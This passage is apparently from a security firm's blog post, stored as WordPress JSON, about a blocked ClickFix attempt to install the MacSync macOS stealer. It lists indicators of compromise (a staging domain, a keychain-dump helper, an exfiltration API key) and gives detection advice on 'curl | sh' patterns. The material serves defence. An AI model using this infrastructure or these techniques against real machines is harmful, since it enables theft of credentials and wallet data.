<code>\/ledger\/<\/code>, <code>\/trezor\/<\/code>) and exfil endpoint (<code>\/dynamic<\/code>)<\/td><\/tr><tr><td><code>ohdentalimplants[.]com<\/code><\/td><td>Domain<\/td><td>Staging domain serving the second-stage payload<\/td><\/tr><tr><td><code>\/tmp\/sync&lt;random&gt;\/<\/code><\/td><td>Path<\/td><td>Randomised collection folder<\/td><\/tr><tr><td><code>\/tmp\/osalogging.zip<\/code><\/td><td>Path<\/td><td>Archive of collected data prepared for exfiltration<\/td><\/tr><tr><td><code>\/tmp\/macsync_&lt;token&gt;.lock<\/code><\/td><td>Path<\/td><td>Single-run lock file (token = 64-char campaign id)<\/td><\/tr><tr><td><code>\/tmp\/.kgrab.sh<\/code> \u00b7 <code>\/tmp\/.kpwd<\/code><\/td><td>Path<\/td><td>Keychain-dump helper and password file<\/td><\/tr><tr><td><code>api-key: 5190ef1733183a0dc63fb623357f56d6<\/code><\/td><td>HTTP header<\/td><td>Exfiltration authentication (campaign\/affiliate key)<\/td><\/tr><tr><td><code>MacSync Stealer \u00b7 1.1.2_release (x64_86 &amp; ARM) \u00b7 Build Tag \"New build 2\"<\/code><\/td><td>String<\/td><td>Malware self-reported version fingerprint<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Indicators are already integrated into the Fortgale Intelligence Feed for preventive blocking across our client base, and will be updated as the Pulsar MacSync infrastructure evolves.<\/p>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 2.7&nbsp;&nbsp;<\/span>Post-incident verification and outcome<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">After the analysis, our team ran thorough checks on the affected host to rule out additional attack vectors or alternative access paths used in parallel, then extended verification across the client&#8217;s systems and infrastructure. No suspicious activity, no indicators of compromise. The event stayed confined to a compromise attempt blocked at its first stage: no host compromise, no final payload execution, no data exfiltration.<\/p>\n\n\n\n<div style=\"background:#0A2952;border-left:5px solid #2B7BFF;padding:16px 22px;margin:48px 0 14px;border-radius:4px;overflow:hidden;\">\n<span style=\"float:left;width:48px;height:48px;line-height:48px;text-align:center;background:#2B7BFF;color:#001B3B;font-family:'JetBrains Mono',monospace;font-weight:700;font-size:21px;border-radius:6px;margin-right:18px;\">03<\/span>\n<span style=\"display:block;font-family:'JetBrains Mono',monospace;font-size:12px;letter-spacing:3px;color:#4D90FF;text-transform:uppercase;\">Chapter 03<\/span>\n<h2 style=\"margin:3px 0 0;padding:0;border:0;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:28px;font-weight:600;color:#E6F0FF;line-height:1.2;\">What to take from this<\/h2>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">The favourable outcome is not the point. The value of the case is that it was a near-miss: a technically well-orchestrated attempt that came within one blocked command of running a stealer on a corporate endpoint, and was stopped not by a mistake on the threat actor&#8217;s side but by the defensive controls in place. Without behavioural detection at the endpoint the outcome would, in all likelihood, have been the download of MacSync and the exfiltration of credentials and wallet data.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Immediate.<\/strong> Block the indicators above. Alert on shell processes spawned from <code>curl | sh<\/code> \/ <code>curl | zsh<\/code> patterns on macOS endpoints, and on mass termination of Terminal processes. Confirm endpoint coverage actually extends to the Mac fleet: the perception of macOS as low-risk is now working for the threat actor.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Short term.<\/strong> Take awareness content beyond email phishing. Developers and sysadmins need to see ClickFix specifically, because their command-line routine is exactly what the technique turns against them. Review software installation paths for technical staff: approved repositories, package managers with signature verification.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Structural.<\/strong> Move detection investment from static indicators towards behavioural analytics at the endpoint and identity level. In a MaaS landscape the campaign changes weekly; the TTPs are the stable surface, and the human remains the most exposed link regardless of technical skill, precisely because familiarity with the command line is what ClickFix exploits.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A cyber attack is not something. It is someone. In this campaign, someone who never had to touch the target: the victim typed the attack chain for them, three times, and it was blocked three times, because the defence was watching behaviour, not a list of known threats.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Knowing the adversary is the first act of defence. Stopping them in time is the second.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><a href=\"https:\/\/fortgale.com\/en\/contact\/\">Talk to our analysts<\/a><\/strong> about ClickFix detection on macOS fleets, or <strong><a href=\"https:\/\/fortgale.com\/en\/contact\/\">request a threat briefing<\/a><\/strong> on the Pulsar MacSync cluster.<\/p>\n\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":16,"featured_media":9998,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,2515,2483],"tags":[3368,3369,3367,3366,212,3317],"class_list":["post-9966","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","category-featured","category-malware-analysis","tag-apple","tag-maas","tag-mac","tag-macsync","tag-malware","tag-seo-poisoning"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/9966","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=9966"}],"version-history":[{"count":17,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/9966\/revisions"}],"predecessor-version":[{"id":10019,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/9966\/revisions\/10019"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/9998"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=9966"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=9966"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=9966"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}